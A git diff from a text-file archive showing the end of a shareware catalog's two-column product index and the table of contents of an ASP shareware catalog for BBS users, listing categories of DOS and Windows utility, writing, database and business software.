(DOG) 13, + 458 453 + DAYO BILLING & INVOICING DISK SPOOL II 44, 448 + 206, 458 DISKLIST 23, 467 + DAYO END OF PERIOD 212, DiZk4D 10, 448 + 458 DJ-CHECK 51, 435 + DAYO GENERAL LEDGER (GL) DJ-LOPE 51, 435 + 190, 458 DJ-SLEEVE 52, 435 + DAYO INDEX 236, 458 dLITE 155, 452 + DAYO INVENTORY 213, 458 DMP 47, 454 + DAYO LITTLE POS 201, 458 DMPLAS (Dot Matrix to + DAYO LOOKUP 237, 458 LaserJet) 56, 451 + DAYO MEMBERSHIP 221, 458 DOS Extensions for + DAYO MENU 101, 458 Professional 13, 441 + DAYO MRP 213, 458 DOS Summary 318, 447 + DAYO ORDER ENTRY 202, 458 DOS Summary (Hypertext) + DAYO PASSWORDS 236, 458 318, 447 + DAYO PAYROLL 210, 458 DosEA 3--10 Easy Commands + DAYO POS (POINT OF SALE) 319, 456 + 202, 458 DosEA 5--All About MS-DOS + DAYO PRICE BOOK 231, 458 5.0 320, 456 + DAYO QUOTES 203, 458 DosEA 4--Find That + DAYO RENTAL POS 203, 458 Command! 320, 456 + DAYO RETURN MANAGEMENT DosEA 1--For Absolute + SYSTEM 214, 458 Beginners 319, 456 + DAYO RETURNS & REFUNDS DosEA 6--Switched on DOS + 204, 458 320, 456 + DAYO SIMPLE POS 204, 458 DosEA 2--What is DOS? 319, + DAYO SMART REPORTS 237, 456 + 458 DOWNLOAD 57, 435 + DAYO TIME & BILLING 192, dPerfect Merge 38, 462 + 458 Dr. Motes' Colorbook 336, + DB2DOC 168, 466 452 + DB2PRG 169, 466 DRAFT CHOICE 338, 457 + dbDIAL(tm) 91, 469 DrawSome 306, 455 + dBF-View 167, 453 DressMeUp 422, 460 + Decision Analysis 261, 467 dtSearch 163, 445 + Decision Analysis(PC) 262, Dueling Dragons 394, 460 + 467 Dupes 27, 468 + Decoder! 136, 436 Duplicate File Manager 7, + DialThat 88, 447 468 + Diamond Data 371, 439 + DICOGO 277, 443 E + DIMANAGE 225, 443 Early Bird 85, 462 + Dinger 144, 456 Easy Access 101, 445 + DirBack 30, 460 EASY BANKING 246, 437 + + Index 528 + + + + Easy Format 24, 462 FILE-MAN 15, 460 + Easy Project 220, 451 FILE PATCH 33, 453 + Easydial 88, 451 FileFinder 27, 463 + Ecomaster 419, 462 Filer! 137, 436 + EDDY (EDit DirectorY) 14, FileXref 298, 460 + 447 Find Area Code (FAC) 175, + EDWORD 128, 440 453 + EE 262, 467 FISHBYTE(tm) 372, 435 + EGA Mouse Paint 307, 462 Flags 309, 433 + EGATrek 408, 468 Flex 133, 443 + EGAWHEEL 414, 452 FlexBase 222, 438 + ELECTRON 276, 451 FLEXIBAK Plus 30, 469 + EliteCheck 253, 442 FLODRAW 333 + EM Klondike 402, 455 Flow Process 263, 467 + EM Poker Solitaire 402, Flow Process(PC) 263, 467 + 455 Flu_Shot+ 117, 460 + EM Pyramid 403, 455 Folders 102, 441 + ENIGMACROSS 415, 437 FormGen 227, 230, 469 + Enveloper 144, 456 FormGen Business + ENVI-MAN 68, 460 Collection 230, 469 + EQUALIZER 312, 435 FormGen Fill 228, 469 + ESF's DeskJet Fonts & FormGen Home Collection + Utilities 52, 463 230, 469 + ESF's European DeskJet FormGen Utility Pak #1 25, + Fonts 53, 463 469 + ESF's European LaserJet Fortune Teller 379, 444 + Fonts 57, 463 FOURU 8, 467 + ESF's LaserJet Fonts & FPLAN-Captital Needs + Util. 57, 463 Planner 246, 457 + Ethics Awareness 389, 434 FPLAN-Education Funding + EVA 179, 442 Planner 247, 457 + Except 79, 468 FPLAN-Income Protection + EXTENDED BATCH LANGUAGE- Planner 247, 457 + PLUS! 69, 465 FPLAN-Personal Financial + EZ-Reader 177, 178, 464 Plnr 248, 457 + FPLAN-Retirement Planner + F 248, 457 + Family Tree Print Utility Furniture + 374, 444 Equipment Survey(PC) + Fantasy 424, 468 264, 467 + FAST INVOICE WRITER 206, Furniture & Equipment + 451 Survey 264, 467 + FAST STATEMENT WRITER 207, + 451 G + FASTFILE 156, 466 GEMCAP 341, 468 + FASTMAIL 158, 462 Geomancy 388, 444 + fastmenu GOLD 112, 440 Get Lucky! 422, 461 + FBNCAT 10, 454 Getkey/2 69, 468 + FCOMP 37, 436 Globally 79, 468 + FDplot 313, 437 Globally/2 79, 468 + Federal Express Label Gopher's Garden 395, 460 + Printer 228, 446 GRAB Plus(r) 64, 91, 469 + Fictionary 415, 462 GRAB Plus(r) for Windows + FIELD GENERAL 407, 455 64, 469 + + Index 529 + + + + GradeBook for Windows 324, Integrity Master(tm) 117, + 434 446 + Graphical Representation INTERSTATE TRAVELER 382, + 265, 467 434 + Graphical + Representation(PC) 265, J + 467 Japanese Business Culture + GREEN 420, 462 231, 434 + JDIR 16, 456 + H JEPRS (Jeepers!) 172, 453 + Handicapped See: + Utilities, Special needs K + HandyDOS 15, 437 KEYTREE TOOLBOX 294, 441 + Hangman for Students 416, KEYTREE UTILITIES 290, 441 + 456 KICK 176, 463 + Hard at Work 390, 444 KP5 164, 439 + Hard Disk Director 113, KWIKSTAT 281, 463 + 467 KWIKWRITE 133, 463 + HDM IV - Hard Disk Menu + 102, 459 L + HDTEST 16, 461 Label Master 159, 433 + Hearts 399, 464 LambChop 31, 437 + HiMOVE 41, 447 LAN-LINK 370, 457 + HOME BUDGET MANAGEMENT LaserForm 58, 447 + SYSTEM 243, 442 LASR-MAN 58, 460 + Home Helper 93, 445 last word 410, 460 + Home Sales System 233, 438 Laughing Dog Screen Maker + Hotnet 182, 449 285, 434 + Household Register 352, LaunchCAD 345, 442 + 445 Launcher 103, 468 + HouseHold TRACKER 150, 462 Layout 215, 451 + How to join as a 'beta' Layout Planning 266, 467 + author 429, 470 Layout Planning(PC) 266, + HowTwo 395, 460 467 + HUGO II LCD: Led's Change + WHODUNIT? 410, 461 Directory 17, 456 + HUGO'S HOUSE OF HORRORS LEANER 224, 438 + 411, 461 LessonPlanZ 323, 448 + HyperPAD 297, 449 LHA 37 + HyperSlide 337, 458 Listico 331, 442 + Lite Format 25, 462 + I LiteComm(tm) for Microsoft + I.Q. Challenge 409, 444 C 290, 455 + IBM PC Author Application LiteComm(tm) for Turbo C + 429, 470 290, 455 + ICP 214, 466 LiteSPM 126, 455 + InContext 115, 450 Little Black Book 89, 467 + Index! 137, 436 LJ2DJ 53, 435 + Information about LJ-SLEEVE 59, 435 + copyrights 429, 470 LJLAND 59, 435 + Information Please 164, LK4.EXE 17, 467 + 463 Loan Amortization 249, 463 + Instant Access Menu System LOGGIT 183, 467 + 103, 434 LOGIK MENU 104, 445 + + Index 530 + + + + Lotto Challenger 367, 456 Mille French Card Game + LOTTO PROPHET 367, 463 400, 449 + LOTTO SIMULATOR 368, 442 Mom's Math 280, 452 + Lotto Thunder 368, 440 Money Smith 249, 442 + LottoMATIC 369, 466 MORFORM 229, 453 + LoveDOS 390, 444 MORSOFT CALCULATOR 83, 453 + LQ 48, 459 MouseTools 302, 468 + LQMATRIX 50, 448 Mover 8, 468 + Movie Guide 361, 442 + M MULTIFILE-XL 160, 451 + MacIntosh Author Multilevel Marketing + Application 430, 470 Simulator 232, 445 + Magic Brush & Magic Show Music Manager for Windows + 333, 452 352, 436 + Mah Jongg--Solitaire 391, MuziTrak System 376, 442 + 468 My Little Realm 250, 438 + Mail Machine 65, 435 + Maillist / M-Label 159, N + 444 NAMEBASE 222, 436 + MakeDemo 184, 452 NAMEGRAM 416, 449 + Maker 296, 468 Names & Dates 93, 450 + Man/machine Process 267, NDOS See: Utilities, + 467 Software tools, For 4DOS + Man/Machine Process(PC) NED 128, 438 + 267, 467 NETCLASS 327, 433 + Mass-Store Copy 31, 446 NEWBIZ 143, 436 + Master Meal Manager 365, Newkey 42, 466 + 436 Nine Men's Morris 420, 456 + MAXI Form 26, 461 Norton's NDOS See: + MaxMan 396, 460 Utilities, Software + Mayan Calendar 379, 444 tools, For 4DOS + MAZE3 406, 446 NPS - Nominal Pipe Size + MCGA utilities See: 278, 461 + Utilities, Hardware + utilities, Screen O + utilities, EGA/VGA Oak Hill Vi(tm) 129, 456 + MegaHost 181, 455 OffLoad 34, 454 + Melissa's Music Flashcards OMNIDay 98, 448 + 376, 462 OMNIDiZk 11, 448 + MEMORY 400, 448 OMNIMeal 366, 448 + Memory utilities See: On This Day 326, 439 + Utilities, Hardware Operation Process 269, 467 + utilities, CPU & memory Operation Process(PC) 269, + utilities 467 + MENU-MAN 70, 460 Operator Process 270, 467 + MenuDIRECT Gold 113, 463 Operator Process(PC) 270, + MenuEase 104, 460 467 + Mercury 280, 447 Optical character + Methods Time Measurement recognition See: + 268, 467 Graphics, Business + Methods Time applications, OCR + Merasurement(PC) 268, applications + 467 ORGANIZE 86, 451 + + Index 531 + + + + ORGANIZE! Jazz Collection Painless Payroll 210, 451 + 353, 459 Paint Shop Pro 340, 444 + ORGANIZE! Memorabilia 353, PAK 35, 446 + 459 PALERT 71, 451 + ORGANIZE! Professional Pallanda 392, 460 + Books 226, 459 Parcel Shipping + ORGANIZE! Your Art 354, Program(PSP)(r) 234, 433 + 459 PATH-MAN 71, 460 + ORGANIZE! Your Books/ PathProj 282, 452 + Magazines 354, 459 PATIENCE 10 403, 464 + ORGANIZE! Your CDs & PATTR 28, 451 + Records 355, 459 PAYMENT BOOK WRITER 257, + ORGANIZE! Your Coin 451 + Collection 355, 459 PBfmt 287, 449 + ORGANIZE! Your Comic Books PBMouse 287, 462 + 356, 459 PBWindows 288, 462 + ORGANIZE! Your Fabrics PC-AP Accounts Payable + 383, 459 194, 454 + ORGANIZE! Your Guns 356, PC-AR Accounts Receivable + 459 207, 454 + ORGANIZE! Your Home 383, PC-CAI 328, 463 + 459 PC Canary 118, 448 + ORGANIZE! Your Model PC Chart (CGA/HGC) 239, + Railroad 357, 459 439 + ORGANIZE! Your Plants/ PC-CHART (EGA/VGA) 239, + Garden 360, 459 439 + ORGANIZE! Your Sports PC-DEAL 194, 455 + Cards 357, 459 PC-Draft-CAD 338, 468 + ORGANIZE! Your Stamp PC-Draft II 335, 468 + Collection 358, 459 PC-ECAP 276, 444 + ORGANIZE! Your Video Tapes PC-FasType/CGA 321, 322, + 361, 459 455 + OS/2-specific software 21, PC-FasType/MONO 322, 455 + 29, 35, 40, 69, 79, 116, PC-FOOD 195, 447 + 300, 321 PC-GL General Ledger 195, + Ounce Of Prevention 115, 454 + 455 PC-GLOSSARY 317, 461 + OutFox 392, 460 PC-HAM 370, 457 + Over_LAZ 60, 461 PC-INFO 76, 449 + Over_LAZ PS 62, 461 PC-Names 160, 450 + Overhead Cost 271, 467 PC-PR Payroll Writing 210, + Overhead Cost(PC) 271, 467 454 + PC-STRAN(tm) 277, 453 + P PC SYSTEM MANAGER 105, 453 + PACE 134, 445 PC-TRACK 348, 436 + PAGE COUNT 132, 441 PCBRIDGE(tm) 278, 453 + Painless Accounting 193, PCBUDGET 250, 454 + 451 PCCLOCK 88, 469 + Painless Acct/Payroll PCFDial 89, 469 + Companion 193, 451 PCForm 227, 464 + Painless Event Processor PCINV Invoice Writing 196, + 70, 451 454 + Painless Menu Manager 105, PCM100.COM 185, 465 + 451 PCOPY 18, 451 + + Index 532 + + + + PCStat 283, 441 Probat 73, 445 + PCX2FNT 60, 435 ProDev*EPRICE 216, 468 + PCX2PCL 61, 435 ProDev*MEMBER 387, 468 + PDAILY 72, 451 ProDev*QUOTE 216, 217, 468 + PDEL 19, 451 ProDev*QUOTE Utility + pE - The 'perfect' Programs 217, 468 + Editor(tm) 129, 448 Professional Master Key + pEDIT PLUS 130, 452 19, 441 + PEG 424, 462 Programmer's Productivity + Peronal Record Keeper 384, Pack 286, 462 + 464 Programmer's SUPER-MAINT + Personal Calendar (PC) for 296, 468 + DOS 94, 469 PROPLUS 180, 442 + Personal Golf Tracker 372, PS-SLEEVE 63, 435 + 441 PS-TEXT 63, 435 + Personal Tarot 380, 444 PSEARCH 20, 451 + Personal Time Card 97, 462 PTOUCH 20, 451 + PhoneBook 80, 434 Public Address 162, 436 + PIANOMAN 377, 449 PullDown SAA Menu Shell + PixFolio Image Catalog 106, 459 + System 11, 439 PURGE 345, 436 + PKZIP 35, 36, 37, 177 PUTMAIL 298, 439 + Plain Vanilla Labels 161, + 465 Q + Play 'n' Learn 306, 459 Q&A Study Aid 324, 463 + Play For Mate 423, 434 Q4Tool 288, 464 + Plot-Line 278, 467 Qanalyst 183, 469 + PlotManager 339, 458 QEDIT 27 + PM2LINO 62, 435 QEdit(R) Advanced 130, 453 + PMZIP 35, 455 QFiler 110, 461 + PoeTrio 315, 433 QFont 61, 461 + Poetry Generator 143, 444 QPACS 253, 443 + Poetry Star 423, 433 QQUERY (All Fox versions) + Point & Shoot Backup/ 169, 466 + Restore 32, 463 QQUERY (FoxBASE+ 2.10 + Point & Shoot Home Manager version) 170, 466 + 251, 463 QQUERY (FoxPro 1.02 + Pool Manager 373, 456 version) 170, 466 + PopDBF 166, 465 QQUERY (FoxPro 2.0 + PostCardMaster 161, 448 version) 171, 466 + PowerBatch Compiler 72, Quilt 346, 462 + 460 quotations 115 + PPRINT 48, 451 + PREP 328, 441 R + Prgmr's Productivity Pack RAM utilities See: + Lite 285, 462 Utilities, Hardware + Print-it 45, 456 utilities, CPU & memory + PrintCAD 45, 450 utilities + PrintEnvelope 65, 437 Ravitz Editor 131, 450 + PrinterBUDDY 49, 437 RECALL 146, 451 + PrintGL 45, 450 Recap 165, 444 + PrintPlus 46, 469 Recon(tm) 187, 447 + PRO-CR 340, 461 Recursive Realm 281, 458 + PRO$TOCK 240, 442 ReNamer 298, 460 + + Index 533 + + + + Renamer 21, 468 Soft fonts See: Utilities, + Renamer/2 21, 468 Printer utilities + Resident Task Manager 95, SoundZ 358, 359, 448 + 443 Space Relationship 272, + Restore See: Utilities, 467 + File utilities, Backup/ Space Relationship(PC) + restore 272, 467 + retail software 115 Spell Games 308, 463 + Retailer 215, 454 Spider Web 396, 460 + REXL-Lazarillo de Tormes Spin Wall 397, 460 + 315, 439 SR-Info 151, 454 + Richard Webster Programs SST: the Supersonic Search + 380, 444 Tool 21, 456 + RIE - Rimrock Icon Editor Stable - Technical Graphs + 299, 465 240, 440 + RoDrones 405, 460 STACKEY 42, 447 + Room 8, 468 STAFF-BASE 151, 453 + Rosewood Journal 196, 465 STAFF-DBMS-PRODUCT-FAMILY + Rubicon Publisher 138, 466 152, 453 + RXridge 283, 452 STAFF-DEVELOPER 432, 453 + RXtraces 284, 452 STAFF-DIAL 90, 453 + STAFF-GRAF 332, 453 + S STAFF-INTEGRATOR 107, 453 + SAFEPACK 9, 436 STAFF-KICK 152, 453 + Save the Planet 325, 438 STAFF-MASK 153, 453 + Savings Account Management STAFF-REPORT 173, 453 + Prg. 251, 451 STAFF-UTIL 168, 453 + School-Mom 329, 452 Stamper 32, 468 + See Mail 180, 439 STARTREK the Computer + SeedMaster 386, 452 Program 408, 457 + Sell More Software 233, Statistical 273, 467 + 439 Statistical(PC) 273, 467 + Serial++ Asynch Comm Stringer/2 321, 468 + Library 294, 439 Strudle 335, 460 + Service Business Design STS26 311, 455 + 223, 434 Super StarTrek 409, 460 + SHERLOCK 38, 467 SuperFly 397, 468 + Shez 27, 36, 463 Swap! 139, 436 + Shooting Gallery 396, 468 SWAPDOS 41, 450 + Show Partner Lite 332, 449 SWAPDS 121, 450 + Shredder/2 116, 468 SWAPLM 123, 450 + Simply Help! 303, 451 SWAPMM 125, 450 + Simply Labels 431, 451 SWAPNG 124, 450 + SlideManager 345, 458 SWAPSK 120, 450 + SLIM 36, 459 SWAPTN 125, 450 + Sloop Manager 106, 441 SwimBase 374, 444 + Smart10 360, 466 Systems Manager 223, 454 + Smart Home Shopper 366, + 445 T + SNAP! 165, 457 T-Zero 411, 464 + Snooper Tag! 139, 436 + the system checker 77, Takin' Care of Business! + 434 AP 197, 459 + SOFF BALLS 373, 463 + + Index 534 + + + + Takin' Care of Business! TransferTIME (TTIME) 188, + AR 197, 459 441 + Takin' Care of Business! TreeTop 111, 457 + GL 198, 459 TriAxis 393, 460 + Takin' Care of Business! TrikTrak 98, 449 + IN 198, 459 Trojan horse See: + Takin' Care of Business! Utilities, Security + M&C 199, 459 programs + Takin' Care of Business! TSR Download 46, 463 + PR 199, 459 TUTOR.COM 321, 447 + Takin' Care of Business! + PS 200, 459 U + TAPCIS 179, 187, 443 UDECIDE 218, 462 + Task Master 220, 433 Utility_Belt 73, 461 + TAX91 243, 466 + TCXL User Interface V + Development 291, 450 Value Engineering 274, 467 + TDisplay 40, 436 Value Engineering(PC) 274, + TEACHER 314, 441 467 + Tear Down the Wall 421, VAR Grade 325, 450 + 456 VEHICLE COSTS 433 + Technical Editor 131, 449 VERSAMAP 330, 464 + TechnoJock's Object VGA utilities See: + Toolkit 295, 468 Utilities, Hardware + TechnoJock's Turbo Toolkit utilities, Screen + 295, 468 utilities, EGA/VGA + TesSeRact Compression VGAWHEEL 417, 452 + System 291, 450 VIDEO BUFF 362, 462 + TesSeRact File Management Video Librarian 362, 445 + 292, 450 VIDEOCAT 363, 458 + TesSeRact Printer Control VideoMaster 364, 448 + 292, 450 VINO:FILE Cellar Master + TesSeRact Screen Designer 359, 465 + 292, 450 VMiX 386 66, 466 + TesSeRact TSR Devel. Volcano Hunter 412, 446 + System 293, 450 Volume + TextCon 140, 443 Hours & Productivity + TextOut/5 141, 443 275, 467 + Textshot 78, 435 Hours & Productivity(PC) + Tikler 96, 452 275, 467 + TiltMaze 398, 460 Vortex 398, 460 + Time is Money 208, 448 + TimeStax 209, 458 W + TimeTrac 217, 448 WAMPUM 153, 452 + Tolman Dental Program 224, WEBS 421, 462 + 437 What's Up(tm) 86, 452 + Total Control 185, 449 WHATS-UP 371, 457 + Total Investor for 1-2-3 WinBatch 74, 443 + 241, 458 WinCheck 252, 443 + Total Investor for Window BOSS & Data Clerk + Symphony 241, 458 293, 453 + TOUCH TYPE TUTOR 322, 461 Windows-specific software + ToyBox II 107, 434 11, 37, 54, 64, 65, 74, + 81, 91, 97, 102, 106, + + Index 535 + + + + 112, 132, 136, 144, 145, Wyndshell 114, 433 + 154, 241, 249, 252, 280, + 324, 340, 347, 352, 401, X + 413, 417 XDIR 22, 444 + WinEdit 132, 443 XPENS 200, 443 + WinGraph 280, 450 XRS ('eXpress Response + WinPost 81, 459 System') 186, 450 + WINWHEEL 417, 452 + WinZip 37, 455 Y + WOPR-WinWord Office POWER YieldBook 255, 438 + Pack 145, 456 Your ESP Test 381, 444 + WordMaster 135, 462 Your Numerologist 385, 449 + WordZ 364, 448 YRWAY 314, 441 + Workbase 172, 444 YRWAYx.ZIP 314, 441 + WorkQueue 221, 463 + WORLD29 330, 455 Z + World Name Game 310, 455 Zephyr 154, 452 + World's Simplest Computer ZideCar 359, 448 + 317, 456 ZiPaper 347, 445 + Wynd-DOS 111, 433 ZPAY 3 211, 469 + Wyndfields for DOS 157, Zpeller 310, 448 + 433 ZZT Arcade-Adventure Game + Wyndfields for Windows 399, 446 + 154, 433 + \ No newline at end of file diff --git a/textfiles.com/computers/asp804.txt b/textfiles.com/computers/asp804.txt new file mode 100644 index 00000000..89d1248a --- /dev/null +++ b/textfiles.com/computers/asp804.txt @@ -0,0 +1,40581 @@ + + i + + + + + + Contents + + + ASP Shareware Catalog for BBS Users (Master Edition) 2 + + Chapter 1: How to read this catalog 3 + 1.1 Minimum requirements . . . . . . . . . . . . 3 + 1.2 Registration benefits . . . . . . . . . . . . 5 + 1.3 Sample product description . . . . . . . . . 6 + + + Part 1: Shareware Products + + + Chapter 2: Utilities 9 + 2.1 Disk utilities . . . . . . . . . . . . . . . 9 + 2.1.1 Disk cataloging . . . . . . . . . . . . 10 + 2.1.2 Hard disk utilities . . . . . . . . . . 12 + 2.1.2.1 Optimization & defragmentation . . 18 + 2.1.3 Floppy disk utilities . . . . . . . . . 19 + 2.1.3.1 Disk duplicating . . . . . . . . . 22 + 2.1.3.2 Disk formatting . . . . . . . . . . 23 + 2.1.4 Directory utilities . . . . . . . . . . 23 + 2.2 File utilities . . . . . . . . . . . . . . . 24 + 2.2.1 Backup/restore . . . . . . . . . . . . . 29 + 2.2.2 File encryption . . . . . . . . . . . . 34 + 2.2.3 File archiving & compression . . . . . . 35 + 2.2.4 File comparison . . . . . . . . . . . . 42 + 2.2.5 File sorting & conversion . . . . . . . 44 + 2.2.6 File viewers . . . . . . . . . . . . . . 46 + 2.3 Hardware utilities . . . . . . . . . . . . . 55 + 2.3.1 CPU & memory . . . . . . . . . . . . . . 56 + 2.3.2 Keyboard . . . . . . . . . . . . . . . . 57 + 2.3.3 Screen . . . . . . . . . . . . . . . . . 58 + 2.3.3.1 EGA/VGA specific . . . . . . . . . 59 + 2.3.3.2 Screen savers . . . . . . . . . . . 61 + 2.3.3.3 Screen capture . . . . . . . . . . 68 + 2.3.4 286/386/486-specific . . . . . . . . . . 70 + 2.3.5 Sound card . . . . . . . . . . . . . . . 71 + 2.3.6 Serial & parallel port . . . . . . . . . 71 + 2.3.7 CD-ROM . . . . . . . . . . . . . . . . . 72 + 2.3.7.1 Audio CDs . . . . . . . . . . . . . 73 + 2.4 Printer utilities . . . . . . . . . . . . . . 74 + 2.4.1 Printer control . . . . . . . . . . . . 79 + 2.4.2 UPCs & bar codes . . . . . . . . . . . . 80 + 2.4.3 Envelope addressers . . . . . . . . . . 80 + 2.4.4 Printer specific . . . . . . . . . . . . 84 + 2.4.4.1 Epson . . . . . . . . . . . . . . . 85 + 2.4.4.2 HP DeskJet . . . . . . . . . . . . 85 + 2.4.4.3 HP LaserJet . . . . . . . . . . . . 85 + 2.4.4.4 PostScript . . . . . . . . . . . . 88 + 2.5 System utilities . . . . . . . . . . . . . . 89 + + ii + + + + 2.5.1 Operating systems . . . . . . . . . . . 89 + 2.5.1.1 Task-switching . . . . . . . . . . 89 + 2.5.2 Multi-OS utilities . . . . . . . . . . . 90 + 2.5.3 Command processors . . . . . . . . . . . 91 + 2.5.4 Batch & macro utilities . . . . . . . . 94 + 2.5.4.1 Batch file compilers . . . . . . 100 + 2.5.4.2 Program schedulers/launchers . . 101 + 2.5.5 Configuration utilities . . . . . . . 102 + 2.5.6 Recovery utilities . . . . . . . . . . 105 + 2.5.7 Fonts . . . . . . . . . . . . . . . . 105 + 2.5.7.1 PostScript fonts . . . . . . . . 106 + 2.5.7.2 TrueType fonts . . . . . . . . . 107 + 2.5.8 Other . . . . . . . . . . . . . . . . 109 + 2.6 Desktop utilities . . . . . . . . . . . . . 111 + 2.6.1 Multi-function . . . . . . . . . . . . 113 + 2.6.2 Calculators . . . . . . . . . . . . . 117 + 2.6.3 Calendars . . . . . . . . . . . . . . 119 + 2.6.4 Clocks . . . . . . . . . . . . . . . . 123 + 2.6.4.1 Precision timers . . . . . . . . 125 + 2.6.5 Phone dialers . . . . . . . . . . . . 125 + 2.6.5.1 Rolodex programs . . . . . . . . 128 + 2.6.6 Alarms . . . . . . . . . . . . . . . . 130 + 2.6.7 Notepads . . . . . . . . . . . . . . . 130 + 2.6.8 Personal information managers (PIMs) . 132 + 2.6.9 Time management . . . . . . . . . . . 144 + 2.6.10 Journal/diary programs . . . . . . . 146 + 2.7 Menu systems & file managers . . . . . . . 148 + 2.7.1 Menu systems . . . . . . . . . . . . . 148 + 2.7.2 File managers . . . . . . . . . . . . 153 + 2.7.3 Combined MS/FMs . . . . . . . . . . . 158 + 2.7.4 Work environment managers . . . . . . 159 + 2.7.5 Software tools . . . . . . . . . . . . 160 + 2.7.5.1 For multiple programs . . . . . . 160 + 2.8 Security programs . . . . . . . . . . . . . 161 + 2.8.1 Virus/Trojan detectors . . . . . . . . 161 + 2.8.2 System activity monitors . . . . . . . 162 + 2.8.2.1 Computer usage monitors . . . . . 162 + 2.8.3 File integrity monitors . . . . . . . 163 + 2.8.4 Computer access security . . . . . . . 164 + 2.9 Special needs . . . . . . . . . . . . . . . 165 + 2.9.1 Vision-impaired utilities . . . . . . 165 + 2.10 Software tools & add-ins . . . . . . . . . 165 + 2.10.1 For multiple programs . . . . . . . . 165 + 2.10.2 For operating systems . . . . . . . . 166 + 2.10.2.1 MS-DOS . . . . . . . . . . . . . 166 + 2.10.2.2 Windows . . . . . . . . . . . . 166 + 2.10.2.3 OS/2 . . . . . . . . . . . . . . 172 + 2.10.3 For JP Software . . . . . . . . . . . 172 + 2.10.3.1 For 4DOS/NDOS . . . . . . . . . 172 + 2.10.4 For Norton . . . . . . . . . . . . . 172 + 2.10.4.1 For Norton Utilities . . . . . . 172 + 2.10.5 For PKWARE . . . . . . . . . . . . . 173 + 2.10.5.1 For PKZIP/PKUNZIP . . . . . . . 173 + + iii + + + + Chapter 3: Writing applications 175 + 3.1 Text viewers/readers . . . . . . . . . . . 175 + 3.2 Text editors . . . . . . . . . . . . . . . 175 + 3.3 Text organizers/outliners . . . . . . . . . 182 + 3.4 Word processors . . . . . . . . . . . . . . 183 + 3.5 Desktop publishing . . . . . . . . . . . . 187 + 3.6 Spelling checkers . . . . . . . . . . . . . 192 + 3.7 Style checkers . . . . . . . . . . . . . . 193 + 3.8 Bibliography . . . . . . . . . . . . . . . 194 + 3.9 Document boilerplates . . . . . . . . . . . 195 + 3.9.1 Resume' . . . . . . . . . . . . . . . . 195 + 3.10 Document control & management . . . . . . 196 + 3.11 Creativity & brainstorming . . . . . . . . 197 + 3.12 Writing utilities . . . . . . . . . . . . 200 + 3.12.1 File format translators . . . . . . . 202 + 3.13 Software tools & macros . . . . . . . . . 202 + 3.13.1 For multiple programs . . . . . . . . 202 + 3.13.2 For PC-Write . . . . . . . . . . . . 203 + 3.13.3 For Word . . . . . . . . . . . . . . 203 + 3.13.3.1 Word for Windows . . . . . . . . 203 + 3.13.4 For WordStar . . . . . . . . . . . . 208 + 3.13.5 For WordPerfect . . . . . . . . . . . 209 + 3.13.6 For other . . . . . . . . . . . . . . 214 + + Chapter 4: Spreadsheet applications 215 + 4.1 Spreadsheet programs . . . . . . . . . . . 215 + 4.2 Boilerplates/templates . . . . . . . . . . 217 + 4.3 Spreadsheet utilities . . . . . . . . . . . 218 + 4.3.1 File format translators . . . . . . . 218 + 4.4 Software tools & add-ins . . . . . . . . . 218 + 4.4.1 For multiple programs . . . . . . . . 218 + 4.4.2 For Lotus . . . . . . . . . . . . . . 219 + 4.4.3 For Excel . . . . . . . . . . . . . . 219 + + Chapter 5: Database applications 220 + 5.1 Relational database managers . . . . . . . 220 + 5.2 Flat-file database managers . . . . . . . . 224 + 5.3 Mailing list systems . . . . . . . . . . . 226 + 5.4 Freeform/text database managers . . . . . . 229 + 5.5 Database utilities . . . . . . . . . . . . 230 + 5.5.1 File format translators . . . . . . . 232 + 5.6 Software tools & add-ins . . . . . . . . . 233 + 5.6.1 For multiple programs . . . . . . . . 233 + 5.6.2 For dBASE . . . . . . . . . . . . . . 235 + 5.6.2.1 dBASE III specific . . . . . . . 236 + 5.6.3 For FoxPro/FoxBASE+ . . . . . . . . . 237 + 5.6.4 For Paradox . . . . . . . . . . . . . 241 + 5.6.5 For Clipper . . . . . . . . . . . . . 242 + 5.6.6 For other . . . . . . . . . . . . . . 242 + + Chapter 6: Data 244 + 6.1 Words . . . . . . . . . . . . . . . . . . . 244 + 6.1.1 Names . . . . . . . . . . . . . . . . 244 + 6.2 Mapping data . . . . . . . . . . . . . . . 244 + + iv + + + + 6.3 Corporate data . . . . . . . . . . . . . . 244 + 6.4 World facts . . . . . . . . . . . . . . . . 244 + 6.5 Zip codes . . . . . . . . . . . . . . . . . 245 + 6.6 Area codes . . . . . . . . . . . . . . . . 246 + 6.7 Engineering data . . . . . . . . . . . . . 246 + 6.7.1 For mechanical engineering . . . . . . 246 + 6.7.2 For other . . . . . . . . . . . . . . 247 + 6.8 Quotes & anecdotes . . . . . . . . . . . . 247 + 6.9 Encyclopedias . . . . . . . . . . . . . . . 248 + 6.10 Government data . . . . . . . . . . . . . 248 + 6.10.1 Federal data . . . . . . . . . . . . 248 + 6.10.1.1 Census data . . . . . . . . . . 248 + 6.11 Software tools & add-ins . . . . . . . . . 248 + 6.11.1 For multiple programs . . . . . . . . 248 + + Chapter 7: Business 249 + 7.1 Business finances . . . . . . . . . . . . . 249 + 7.1.1 Business accounting . . . . . . . . . 252 + 7.1.2 Point-of-sale systems . . . . . . . . 259 + 7.1.3 Billing/invoice systems . . . . . . . 263 + 7.1.4 Purchase order systems . . . . . . . . 266 + 7.1.5 Payroll systems . . . . . . . . . . . 267 + 7.2 Inventory systems . . . . . . . . . . . . . 268 + 7.3 Decision analysis tools . . . . . . . . . . 274 + 7.4 Equipment use & maintenance . . . . . . . . 276 + 7.4.1 Computer-use logging . . . . . . . . . 278 + 7.5 Employee management/scheduling . . . . . . 279 + 7.6 Project management . . . . . . . . . . . . 283 + 7.6.1 Project bidding & costing . . . . . . 285 + 7.6.2 Project scheduling . . . . . . . . . . 286 + 7.7 Client management/scheduling . . . . . . . 288 + 7.8 Organization charts . . . . . . . . . . . . 290 + 7.9 Specific-field systems . . . . . . . . . . 291 + 7.9.1 Construction, installation & repair . 291 + 7.9.2 Farming & ranching . . . . . . . . . . 292 + 7.9.3 Food services . . . . . . . . . . . . 292 + 7.9.4 Hotel/motel management . . . . . . . . 295 + 7.9.5 Legal & law enforcement . . . . . . . 295 + 7.9.6 Library . . . . . . . . . . . . . . . 296 + 7.9.7 Medical & dental . . . . . . . . . . . 297 + 7.9.8 Non-profit businesses . . . . . . . . 297 + 7.9.8.1 Fund raising . . . . . . . . . . 297 + 7.9.9 Political parties . . . . . . . . . . 298 + 7.9.10 Real estate . . . . . . . . . . . . . 299 + 7.9.11 Safety & fire protection . . . . . . 301 + 7.9.12 Small businesses . . . . . . . . . . 302 + 7.9.13 Other . . . . . . . . . . . . . . 